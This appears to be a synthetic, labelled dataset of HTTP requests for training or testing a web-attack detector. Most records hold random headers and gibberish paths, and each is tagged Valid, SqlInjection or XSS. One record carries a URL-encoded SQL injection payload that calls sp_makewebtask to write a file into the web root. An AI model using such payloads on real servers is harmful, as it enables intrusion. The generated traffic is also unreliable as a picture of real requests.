Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 12.15.76.12
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45195
Start - Id: 33450
class: Valid
PUT /yiz.Aq-eR6tBcDDT.C/c72/j5oiasE/u@XCG6O7Ru/tf8aantfmif/83iYVGkJ/nPSHa0gILXaqj.css? HTTP/1.1
Content-Length: 31
Content-Language: et9aahnE
Content-Encoding: identity
Content-Location: http://www.utadi.st/b1oU/cQbetl/ribp/nzhxden.jpg
Content-MD5: ZXVvaHJzZG9vc3pwaHllaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Jan 07 03:19:43 UTC
Last-Modified: Tue, 28 Apr 09 23:41:22 CET
Host: 196.151.179.104
Connection: keep-alive
Accept: image/gif;q=0.4
Accept-Charset: iso-8859-8-i
Accept-Encoding: deflate, gzip;q=0.1, deflate, identity;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 234.120.33.144
Cookie: orbeoolweatxoy=1lc8;zbeo=uCuImo3;3d@orXnodecmdD6E=07;mm=310442
Cookie2: $Version="6"
Date: Mon, 17 Mar 08 02:00:40 CET
ETag: "OBRpOLDexlTKNOercvA"
Expect: 100-continue
From: rypkuF@annazi.gov
If-Modified-Since: Tue, 29 Sep 09 23:05:05 CET
If-Unmodified-Since: Sun, 06 Feb 05 03:08:49 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Aug 05 17:52:58 UTC
Max-Forwards: 4276
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic cnRjZW86bnNucmZu
Authorization: edtq mouo=tnrAmd
Range: 6-,-8,-324
Referer: http://www.etRa.com/hnle/eheodere.cgi
TE: chunked,trailers,deflate
Trailer: Accept-Encoding
User-Agent: bffmLK1 http://www.op8rMaC.it
UA-CPU: StrongARM
UA-Disp: 9739,949,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 669x659
Via: 6.7 69.245.121.118:33, 9.8 218.72.226.66, FTP/5.7 37.159.91.134
Transfer-Encoding: pecEt; vptce=lhetsebe
Upgrade: encr/4.7, csRuef/7.1, ee6/1.4, tehaa/9.8, 7en/7.5
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

t6jhnAeh=>thgeod5emexeco7emae

End - Id: 33450
Start - Id: 32055
class: Valid
GET /gIEPVB9brEko2Hco4/rt7/4s8kDGNcl2/Nateh2onwieoO/JaLncGe50dJKHlp/ycTcsn/@sJconnectd0/njWuUBhST6s/DmCKTYyUTA3.js?I5Yn-Fwherei3=1123643&En2S1xE=3&seahae74dl=ia%26psA&bobl0tO=1413458 HTTP/1.1
Host: www.biuvkn.biz:05
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 83.23.198.140
Cookie: @d2execinput8alN=rfstmevalHdfn;pnmSreiiaZeile8=40;to5pEeteu=3Kl
Cookie2: $Version="7"
Date: Tue, 13 Sep 05 09:27:07 UTC
ETag: "CpglYrZDfQpIIygqI"
Expect: 100-continue
From: wNooie@yaieEicl.de
If-Modified-Since: Mon, 22 Nov 04 24:18:30 UTC
If-Unmodified-Since: Sat, 21 Feb 09 19:32:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Jan 08 17:40:53 UTC
Max-Forwards: 537
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic aGx1ZTppbHJ0ZQ==
Authorization: aSLf0 ryrrt=snrzIdtr
Range: 81-,-8,-69673
Referer: http://s1qcemm.org/ohErr/todi/rmlelpeG/banea.pl
TE: chunked;q=0.5,gzip
Trailer: Authorization
User-Agent: et2v8- http://www.atoLo.gov
UA-CPU: x86
UA-Disp: 342,5429,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8661x2250
Via: HTTP/6.3 www.oiohEin.jpg, FTP/8.7 www.eilxm.png
Transfer-Encoding: compress
Upgrade: Leh/7.4, odi/8.1
Warning: 652 183.221.129.170 "snnhhrllRstie" 
X-Forwarded-For: 211.198.61.151
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32055
Start - Id: 1800
class: Valid
GET /aw-bYj/ey57/6tmrCaihunsea/tlaos3/hfkc@dbqVratZ/wdheascacs8g9h/access_logH/urnwfpersNtnac/eInnmlytBdmfragHba2/WHaAPQ_7fromvR/x6mnooMoeapTw/oGp@D@3SdUbfMl.php4?cmlec=5tioaLehodIswrre&ipoarhcuOrncm=oIOys2-5&Ago3system=qclnnkdbta&ngblijegU=tmnc%2Bs%40n%3Ama+location%3CEal&ercr=0drn&lldapncfjang=rua83cBhf&AjstlszoNltqt=+%3BrN&9@8M-8EC3=803957&1ag6=7 HTTP/1.0
Host: 253.30.106.211
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: tn8o-aowt72sh;q=0.0, srYd-b;q=0.3, s-hr
Cache-Control: no-transform
Client-ip: 242.142.150.13
Cookie: Ciea0do=62988;ctyrgrlct=t;DdITvbscriptjyPhtaccesD0T=95;eflrioter1mh=a6Y04VHnjE6;apwde=18;rfenn92dejee=373
Cookie2: $Version="396"
Date: Sat, 09 Apr 05 23:04:31 GMT
ETag: W/"tv5GcdYhIhpO_PfTD"
Expect: 100-continue
From: 7frnoich@oyp7eutp.biz
If-Modified-Since: Mon, 03 Oct 05 08:43:15 UTC
If-Unmodified-Since: Fri, 19 Sep 08 09:33:28 CET
If-Match: "qyd7rTjdgh0SJR21"
If-None-Match: *
If-Range: *
Max-Forwards: 69
MIME-Version: 0.4
Pragma: tj='ep'
Proxy-Authorization: Digest username="rlyw6hrn"
Authorization: NTLM bklkd21oczg0VDFxb2h1bnFpaW5qNG9yb3Nob2VPc2hh
Range: 9724-,33511-083617,2-
Referer: /ogos4o3h/gsi1yts/qisum/ntaAe.tar.gz
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 8.2; rs-vc; rv:1.4.6) Gecko/28988444
UA-CPU: x86
UA-Disp: 756,3724,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 912x237
Via: h4ia/4.8 141.196.206.117:3, 8.1 www.rnndp3.tiff, FTP/4.4 234.106.247.232
Transfer-Encoding: aaeelu
Upgrade: cmt/5.3, w6e8oe/8.1, je0dn/3.0, h7S/4.2
Warning: 604 27.74.229.180 "uehtEmh0ejdosHSisd" "Mon, 15 Feb 10 03:04:51 UTC"
X-Forwarded-For: 71.120.203.217
X-Serial-Number: 0392549
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1800
Start - Id: 6640
class: Valid
PUT /documentG/ip/baJ/mivwcifM/pctanoldtnrnep/rbmrduMLIt@-y.G/snirao2aGDyRrPsylu6g/va/yedinettoeyf.php? HTTP/1.1
Content-Length: 301
Content-Language: zqtrAni
Content-Encoding: identity
Content-Location: http://www.3hbnryS6.ch/ahR3h/shtdelry/bnievh6w/esgiw.gif
Content-MD5: ZHNlaWVlN29pc2VzZFV6bA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Jan 06 10:55:05 CET
Last-Modified: Wed, 02 Aug 06 09:42:44 UTC
Host: www.eucho.uk:80
Connection: weeN
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ua-couandi
Cache-Control: no-transform
Client-ip: 46.201.126.153
Cookie: 5eexb5amnTa65f=582488
Cookie2: $Version="345"
Date: Tue, 06 Jan 09 16:20:55 GMT
ETag: W/"v7N@UYgIYxK63@18EeG"
Expect: 100-continue
From: opcra@uqeH.it
If-Modified-Since: Tue, 26 Oct 04 12:56:32 CET
If-Unmodified-Since: Wed, 20 Apr 05 05:47:29 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 177
MIME-Version: 0.0
Pragma: t8yTo0g='tqnzZ'
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: Digest opaque="Hueg8eu"
Range: -08,-241,7-856
Referer: /lt8e.sh
TE: chunked;q=0.6
Trailer: Pragma
User-Agent: 5lcKfF http://www.vtrrb.de
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 792x1593
Via: 1.5 www.gstlcC2.css:00201, 0.8 www.PaelH.png, 9.8 245.188.234.56
Transfer-Encoding: deflate
Upgrade: zfoa/4.4, me8e/8.0, eH5/5.3
Warning: 107 www.Hiehri.js "eswanigari" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

cenhElsniixtr7w=94718854&HGeqG=TA&6hs=intuhoo]catnsr&LtrzrAwfoctnc=41324511&ok=xkg&Hd4=cupdateno )xrru%winntOitw+dm&tuhrEn=7896862&Dfa=qd&a2siehrneabuieu=h>mofthttp>hk likel%eeqa/i&36p=icD&mdtiBC6eo=m2j4vlobBtdTij&rdnAobStijldr=008089&onateo=6Mjo&sn=12252817&FVpasswdIFu_union-C6=lb_Av

End - Id: 6640
Start - Id: 11862
class: Valid
GET /na9eo2sltqstihsbu/iuglalkrdlnM/oa.swf?HhdyBYJFmUH=nsrpOohtpassedfot&IihttpsOgTlm=1140633327&ylznwn3nmer=ure&0selsnt=E&MEetcb8q=878518&JJYlKwwlocation6YeP=i76inssmochaau&g9mtnltu=rzhSc&olnanv=185632&H._A_=lgkkth1fqani5K&8ail1bg5b=7&@3-processing-instruction-2NV2mp=97l&esecpla0nhmy6=qioOgosheia&estzty4=132&hameptRdeqn=tb1nwcdgeurst6o&b8hsefyXl=06384006 HTTP/1.0
Host: www.imiiax.uk
Connection: saibzr9f
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity, identity
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 253.123.138.51
Cookie: d49p0oegfbs4ns8=-;ira6Ai2lis=twOTcwc
Cookie2: $Version="707"
Date: Sun, 12 Sep 04 10:13:20 CET
ETag: W/"63D0fXxNEmQl@u3M_yXu"
Expect: eo6ITna=f0lro7h;mqmonjt
From: letI@hnH5isut.cz
If-Modified-Since: Wed, 22 Sep 04 05:58:23 GMT
If-Unmodified-Since: Tue, 09 Oct 07 11:33:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.4
Pragma: eso9=c4i
Proxy-Authorization: hnLol ueohtIwr=wHldEo
Authorization: Basic cmE3YUs6ZUxocA==
Range: -5,8-9019,5352-463
Referer: /hk6aifsh.doc
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 0.6; Am-q6; rv:8.6.4) Gecko/24600826
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 872x2543
Via: pat/1.3 21.204.195.122, 8.2 www.oseti9o.gif, 4.4 www.aeie.js:4239
Transfer-Encoding: deflate
Upgrade: lltieH/6.5, 2et/0.0, iyc5/0.7, 8ffaA/4.1, ur2r/2.3
Warning: 165 174.179.176.135:93465 "taieryl3onnp5cttaanx" "Wed, 31 Dec 08 04:33:55 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 02595980702101510
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11862
Start - Id: 30818
class: Valid
GET /oTh8tsm/ZFjsT/i7bscriptgorV@lUz/tshrCqzsOdmh/xrst/o_mhQCjXFnph-T4D2/r76H/teTae/EPbqC/lB.jpeg?n04plMtnoymwee=8100433701&tseidc=02060&rdivFeI@Zmocha=exechdsxgt&betweenreplaceArvQoQZ6Oq=bH6iunionsl8u&opecqt=sNq80MOOX&-Okxml=k&qXBMdivLrjpassthruBsxp_=s.eO4Z5&DpsGUs=besr&e0r5c=aUtc HTTP/1.1
Host: www.5nechotn07.be
Connection: 8Itr
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 231.255.69.126
Cookie: eoTyzEe=yxr4~;logL2Pc8s=HbdHp3f1betnetsb;sBselcEa=cUw6pmcn6wrxro
Cookie2: $Version="58"
Date: Sat, 22 Oct 05 14:31:00 GMT
ETag: W/"lAopf6ffXu_8U.NL6R@"
Expect: nvtnnsoe
From: atr4n8@erh1g.biz
If-Modified-Since: Fri, 08 Sep 06 20:51:43 GMT
If-Unmodified-Since: Tue, 22 Sep 09 24:56:12 UTC
If-Match: "7qMNw7DDJTy-gVa"
If-None-Match: *
If-Range: Mon, 05 Mar 07 19:43:47 GMT
Max-Forwards: 2
MIME-Version: 2.2
Pragma: ola='e'
Proxy-Authorization: Basic YVNlYnNjYWc6YXROSTU=
Authorization: Basic aTJhbjo4ZWxzZW9hSw==
Range: 66262-55561,-1
Referer: /Tioo7d.tar.gz
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/5.6 (X11; U; Linux i386 7.5; ds-rc; rv:4.4.0) Gecko/41796265
UA-CPU: PowerPC
UA-Disp: 0029,310,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 394x7856
Via: 9Ude/4.7 www.T5vm.html, 0.7 www.ceiihhl.jpeg, hgH/5.9 220.131.17.84
Transfer-Encoding: gzip
Upgrade: q15f/6.4, ouaiqo/0.5, r3a/6.5
Warning: 313 www.hlalfjmb.js "rqeAssmteih" "Fri, 24 Mar 06 15:57:48 CET"
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 23620513088799
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30818
Start - Id: 41139
class: SqlInjection
GET /jW4Tx5/s8h/midLbklawaaeee8rS/rm./aQ8VbXRj/WE7qQBc4A/8Lo/t_183OGTTasa3PHOe/eoaUbs89GhvSKEqba/CTdP3MRWmTh@.gif?m7m=%27%3B++EXEC+master.dbo.sp_makewebtask++++%27c%3A%5Cinetpub%5Cwwwroot%5Cacu.gif%27%2C+++++%27SELECT+Otra++++FROM++r9ih2fNO+++WHERE++++xtype%3D%27%27U%27%27%27 HTTP/1.0
Host: 188.41.176.197
Connection: keep-alive
Accept: audio/*, audio/*;q=0.4
Accept-Charset: x-mac-arabic;q=0.4
Accept-Encoding: gzip;q=0.3, identity, identity;q=0.3, identity
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 1.110.214.117
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="173"
Date: Mon, 12 Jan 04 14:53:20 UTC
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: r3rduu0D@aEtfemeowc.cz
If-Modified-Since: Sat, 10 Jul 04 14:14:37 GMT
If-Unmodified-Since: Thu, 21 May 09 06:50:01 CET
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: "KuNHUMzqJiC.OFi6Wx"
If-Range: *
Max-Forwards: 92
MIME-Version: 7.8
Pragma: drcar='5lizntie'
Proxy-Authorization: Basic dDlsN2UzOnJnZWUyZQ==
Authorization: Basic bWlydGw6U2VzczNpdGg=
Range: 9-668228,-687
Referer: http://pto29tso.com/7shLW2ny/umlaL/5sRgn1i/srmn2Iq.pdf
TE: gzip;q=0.4
Trailer: If-Unmodified-Since
User-Agent: mrt2 (sJRuoD0f)
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: FreeBSD
UA-Color: color16
Via: 3.2 www.ee1uI.shtml
Transfer-Encoding: identity
Upgrade: ng6s/4.8, 4et/8.2
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 200032143188636
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41139
Start - Id: 15728
class: Valid
GET /ls8o/hn.10XDW-Gv-a6/iv4/m_/mfkZBfGVlDPJMgFlk/zd.gujIls7NJzE/gPGjaLJ6C/e6ZntU30YG.jpg?jNm=sA4y&hrtnfssb0=la+st&aEim3rj=o%28DohrXkon%2Fr%25n-se&a8MIjC.location2=sWqL.Gx%40Nb&ca=Sr+gtbtgberm HTTP/1.0
Host: www.drlq7tssiq.cz
Connection: uknawhei
Accept: image/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: 6o-9;q=0.3, a2nrpfV-pCod;q=0.8, mhamse-rEounf, 8aefl2er-l9cMer
Cache-Control: no-cache
Client-ip: 86.42.199.9
Cookie: S_eZ7nph-Sh7=ua;itiaesnhlsgwaxy=198308113;lnb3=hKZ7i;a04znim=ro>07oehdc
Cookie2: $Version="3"
Date: Mon, 19 Nov 07 09:29:34 CET
ETag: "7XrUqJ2q9Xbm.yp@I-v"
Expect: 6eatinnv
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Sat, 10 May 08 10:06:20 CET
If-Unmodified-Since: Tue, 09 Dec 08 02:47:53 CET
If-Match: *
If-None-Match: "Ao9GR.CJPsK3NK-Vs"
If-Range: Fri, 04 Dec 09 06:57:41 GMT
Max-Forwards: 427
MIME-Version: 2.5
Pragma: ocqot4s='EG4two'
Proxy-Authorization: Digest uri=/hee7.css
Authorization: Basic Z3Blc2NlcjppdG5UVGFs
Range: -6328,78162-3,153412-46
Referer: http://www.slitr6.org/7nbaod/bSixehh.mpeg
TE: trailers
Trailer: Accept
User-Agent: fFyHAgOGyn http://www.xpytcmb.org
UA-CPU: MIPS
UA-Disp: 6952,635,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 638x329
Via: FTP/0.0 www.zniewu.tiff, HTTP/1.1 54.171.194.168, 6.8 www.ravwra.js
Transfer-Encoding: deflate
Upgrade: qrejo/1.3
Warning: 005 135.73.33.138 "yr2lt" 
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 555023929683
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15728
Start - Id: 20787
class: Valid
GET /a7ljB.hpQdyloo/OzLwinntWmeTtservicesFof/acniwcspnl8w12t8/iVQUJe/tyoehaubnrfobsssec8n/afOd61F.YzhHS0/Fh@-RS/aFMrdq.php3?OgomxoQayel=350387&htad0s4rarecoo=l1sS64&zToNA-Qewget=11955&dnooturece=9570445004&cge9mrh=rdZZPz&3.2RS7vRY=Stp%5C&kvnscem=Oieh&iRn6mr8ea=lib&stzttr=60813001&sh7lp4=iLkoehl&tjkdtn43hg1=isot5e&1x6=Tugtew&oenseiww=hhSn&0-n1orRH6Ul=neselectaeSaEucmd HTTP/1.0
Host: 16.145.177.14
Connection: close
Accept: video/quicktime, video/quicktime
Accept-Charset: x-mac-hebrew, windows-1257;q=0.2, hz-gb-2312;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 104.130.72.27
Cookie: gOohTesN=Sdy0zgsEs7lis;zxezd8E9wffeag=2655727848
Cookie2: $Version="61"
Date: Wed, 29 Jun 05 21:04:34 GMT
ETag: "SxxezlG.P77kXg5s"
Expect: tngo
From: txeT@aevntoegn.com
If-Modified-Since: Thu, 12 Nov 09 03:17:57 UTC
If-Unmodified-Since: Mon, 06 Nov 06 14:52:49 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Mar 09 15:35:08 CET
Max-Forwards: 38
MIME-Version: 3.7
Pragma: ctNl='rrlztn'
Proxy-Authorization: Basic YUQ4cXlvczpvYWVhU3dJZQ==
Authorization: NTLM bmlMM25lc2Z2ZnJvN2R5YWlscm9pdGU5cmxpZXRmcFNlZWVlU2l0QWx0cGQ=
Range: 468072-,7838-92,92-4796
Referer: http://Ntd6u.it/Hheittd/t5er/8gicc.conf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/0.6 (Machintosh; U; PPC Mac OS X 4.6; qe-sb; rv:1.8.1) Gecko/04987780
UA-CPU: Sparc
UA-Disp: 369,7940,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2009x4676
Via: bn4/8.2 www.nmw8si.gif:31382
Transfer-Encoding: l2kheu
Upgrade: Mdfomo/1.8, o7nea/3.7
Warning: 382 www.ansbT.htm "haeTtpIHaan" "Fri, 12 Aug 05 07:42:57 CET"
X-Forwarded-For: 174.119.33.87
X-Serial-Number: 39917227024822129
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20787
Start - Id: 13064
class: Valid
GET /eME59Jtm.hqf/4Boctmp/oH/mt9oAv9MX/wiicnieaAnfa/a_P/8CvFtim6awsttoKoe5/h2/fkCpn/WnodejCk@hYiVKs/azpr1Xx5YYNz@dyRVgAr/ep6ebt5uQsf5xZLlgKCm.css?iit=window.openescs HTTP/1.0
Host: www.bxeeaanff.com
Connection: CmmnI
Accept: text/xml
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: j-nca;q=0.8, cr3niY-3iEwxt;q=0.5, uym7ij-o;q=0.7, hiCcprR-ewiong, ieRAht-aonide
Cache-Control: no-cache
Client-ip: 21.241.196.235
Cookie: ub=Tr6Tiocebeuae4;eH9hArl=ltm;wQtawewERo0eArk=79;meataanewt=nMv24tOA-;ZWsGd%u2VJAD=amf%3Eo1pvnpz4+s
Cookie2: $Version="21"
Date: Wed, 18 Feb 04 09:39:36 UTC
ETag: W/"EkEIURHNewalKPt"
Expect: 100-continue
From: manricn@CteJ.gov
If-Modified-Since: Sun, 01 Oct 06 09:01:55 UTC
If-Unmodified-Since: Thu, 09 Mar 06 13:23:26 UTC
If-Match: "NYHwDp.8r-jvmXApYQg"
If-None-Match: "My@b2LQzlZLp6ede93oh"
If-Range: *
Max-Forwards: 763
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Ycxr satemsyr=pveoeaeo
Authorization: NTLM dGVhaW11b2w5NDg3ZWhlYWVlcmVyZ2VtaXBtZXM0ZHB3ZWFpNmhUemozbHRWbA==
Range: 55-
Referer: http://www.0mnj.uk/wagoE.exe
TE: trailers
Trailer: Referer
User-Agent: trbdeabsslty
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 455x190
Via: FTP/8.4 www.fTnqn.css, 5.4 www.elso.jpg:002, 7.6 www.hnTeEtc.js
Transfer-Encoding: compress
Upgrade: er4nxy/4.1, isaqen/1.6, iN16e/5.5
Warning: 628 www.nttty.js "cnhetkwotorseofg3" "Sat, 23 Jun 07 05:37:50 GMT"
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 837041373393858
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13064
Start - Id: 22031
class: Valid
GET /eLGs.exe?jo=usreNettieqct%5Cftpn&somthzs2xs=%7El HTTP/1.0
Host: www.psWocrr.fr:3406
Connection: close
Accept: image/*, audio/*;q=0.3, image/png;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 254.122.123.9
Cookie: ya8tolbwe9iA=228989;t9Xsbp=c5ctneiEsShfgxhj;4oRreoir=tmeeqowieawhe0Mh;Qnull-I435hwp-Mf=925383399
Cookie2: $Version="4"
Date: Thu, 13 Jan 05 23:37:31 CET
ETag: "OjbW9x0lMmWzDJ2U"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Mon, 19 Dec 05 16:45:44 UTC
If-Unmodified-Since: Mon, 17 Nov 08 08:02:29 UTC
If-Match: *
If-None-Match: "mLgGtNnxlgXrz4midU-"
If-Range: *
Max-Forwards: 1
MIME-Version: 1.6
Pragma: fun='tdsc'
Proxy-Authorization: NTLM Um9zRndCZXRPaXl1MEU0c3RFY2xlcmRlM3JlZmdybnI=
Authorization: ts7en z7ehoeo=rtp7
Range: 5-448267
Referer: /dn0tje0W/beevfpu.zip
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 0.0; uo-b2; rv:7.3.0) Gecko/37472549
UA-CPU: StrongARM
UA-Disp: 077,354,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7963x8460
Via: HTTP/4.0 www.lIifhbM.html
Transfer-Encoding: deflate
Upgrade: p9tI/9.2, 8r9o/6.5, aeyn/9.3
Warning: 103 www.Krm9fhll.htm "rrsU3rWt9etr" 
X-Forwarded-For: 154.57.178.151
X-Serial-Number: 10148622161169
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22031
Start - Id: 18904
class: Valid
GET /do6od9ec9ein/J2T/irYmPHQzH2nrA/dp53SvAU06flCDIVeKCM/netoeoenjthns2w0xt/0hAGsjVopenfe0.js? HTTP/1.0
Host: 51.56.192.64:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-2, x-mac-korean;q=0.7
Accept-Encoding: 
Accept-Language: d-g;q=0.9, tanenm-6lnn, rc-3game5, jR-atss;q=0.0
Cache-Control: no-transform
Client-ip: 81.12.5.171
Cookie: vIQeVL=izaldsss2c517tr;sPU6XOv0A5Ys=23791716
Cookie2: $Version="057"
Date: Tue, 15 Dec 09 05:29:30 CET
ETag: W/"udDnScoYv.CmRPsiE"
Expect: 100-continue
From: sAoSt@vajrs.st
If-Modified-Since: Thu, 17 Aug 06 19:04:14 CET
If-Unmodified-Since: Fri, 02 Jan 09 09:02:49 UTC
If-Match: "a@b2WkLAFKSQTaWK"
If-None-Match: "Fij0PQEIUe.OVaqt8ZG"
If-Range: Sun, 21 Nov 04 11:17:40 UTC
Max-Forwards: 82
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic bGJKczp0ZHRl
Range: 14-63534,8995-18,3-83
Referer: http://ohtge.net/crncemll.msf
TE: deflate;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: oylrOco (onX5T6X; sPfIft_; axe_Pfc9QS)
UA-CPU: MIPS
UA-Disp: 7305,2751,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 905x897
Via: FTP/2.0 www.ilio.js, 3.9 www.gren.tiff, FTP/6.1 11.88.179.164:1501
Transfer-Encoding: gzip
Upgrade: eRaba/1.6, mmqn2/8.0, cwzoea/3.0
Warning: 226 www.njsira.shtml "3eahntvtanuw" 
X-Forwarded-For: 197.169.87.183
X-Serial-Number: 463833630
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18904
Start - Id: 22672
class: Valid
GET /rnPZT4SiHRk34fn7.Fs.aspx? HTTP/1.0
Host: www.te9iergets.cz
Connection: keep-alive
Accept: image/*, image/*;q=0.0, audio/basic
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 33.11.242.255
Cookie: eionu6n=7roel];rinoiTwqDq=brm;fbYU1Cboot.inix6gJ6=plinknpr
Cookie2: $Version="67"
Date: Thu, 11 Mar 04 24:57:36 CET
ETag: "jnQdKGMrAZBmOLKG0"
Expect: ki8htes=Ooesdbwh
From: ohhR@ti5t.uk
If-Modified-Since: Thu, 18 Mar 04 15:41:49 CET
If-Unmodified-Since: Wed, 15 Aug 07 02:31:02 GMT
If-Match: "l6SqHe1jctDHgh4"
If-None-Match: "UDmmJBB5CdC_2.p"
If-Range: *
Max-Forwards: 2186
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: go0M6u fnxd=4kel
Authorization: ee3es heultCti=araUrtku
Range: -955
Referer: http://www.picbQ8nt.it/lStd/sdy0n.shtml
TE: trailers
Trailer: Accept-Encoding
User-Agent: nAMaiia
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0084x738
Via: FTP/1.0 23.27.6.150, HTTP/6.2 242.196.49.233, 9.4 242.115.172.169:3196
Transfer-Encoding: gzip
Upgrade: Ttn/9.0, tP0eRt/0.6, u4tias/8.0, alon/7.6, m9oa5l/9.7
Warning: 339 www.8cxlJeOf.htm "y9hruhNaeio8rni" 
X-Forwarded-For: 118.32.112.86
X-Serial-Number: 12701556330524195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22672
Start - Id: 46933
class: XSS
PUT /0ZaUIayJJ6SQT605Dv/-documentIlnsUsEclibexect/iABmIwcIw/du40.vW/Ocye/sacraO1oodni/d9ejeeatRkS/l8pso.css? HTTP/1.1
Content-Length: 100
Content-Language: nh,rdmUds,2
Content-Encoding: gzip
Content-Location: http://www.oduot.uk/Oico2/seclo.htm
Content-MD5: VDVzc2V0cmV2b2Rhc2FtYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Sep 05 19:56:22 UTC
Last-Modified: Mon, 21 Jul 08 20:59:21 CET
Host: 200.183.87.34
Connection: keep-alive
Accept: text/*, audio/x-wav, video/*;q=0.3
Accept-Charset: x-mac-arabic;q=0.7, iso-10646-ucs-2, koi8;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: Etez='w'
Client-ip: 76.30.12.210
